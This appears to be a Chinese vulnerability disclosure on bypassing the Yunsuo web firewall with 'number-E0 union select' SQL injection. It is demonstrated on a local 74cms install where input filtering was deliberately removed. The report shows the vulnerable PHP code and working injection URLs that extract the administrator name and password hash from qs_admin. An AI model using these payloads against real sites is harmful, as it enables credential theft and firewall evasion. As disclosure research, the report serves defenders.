### 简要描述:
这次来个实例
### 详细说明:
@疯狗 感谢提示,参考zone http://zone.wooyun.org/content/16772
id=8E0union select ...这种方式
和id=8.0union select ...
### 漏洞证明:
本地搭建74cms web环境并把云锁所有防护打开。
[<img src="https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg" alt="yy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31122654e5de7ba857b1532eb3f5c7bd012036ff.jpg)
下面注入点是把对应intval去掉后测试的
include/fun_wap.php
```
function company_one($id)
{
global $db;
$wheresql=" WHERE id=".$id;//这里
$sql = "select * from ".table('company_profile').$wheresql." LIMIT 1";
$val=$db->getone($sql);
return $val;
}
```
还有全局的gpc过滤也关闭
/include/common.inc.php
```
if (!empty($_GET))
{
}//这里是GET型注入,把addslashes去掉
if (!empty($_POST))
{
$_POST = addslashes_deep($_POST);
}
```
1.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
出来各种注入点了:
[<img src="https://images.seebug.org/upload/201412/3112234173f2208ffc1128f100e380e115618e89.jpg" alt="yy.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3112234173f2208ffc1128f100e380e115618e89.jpg)
2.http://localhost/74/wap/wap-company-show.php?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
管理员账户名出来了:
[<img src="https://images.seebug.org/upload/201412/31122615c3489148d5accc617238c5a0f7234ebb.jpg" alt="yy1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31122615c3489148d5accc617238c5a0f7234ebb.jpg)
管理员密码:
[<img src="https://images.seebug.org/upload/201412/3112263201d3dac77edfb511b37be9cebf4b3441.jpg" alt="yy2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/3112263201d3dac77edfb511b37be9cebf4b3441.jpg)
京公网安备 11010502034610号
暂无评论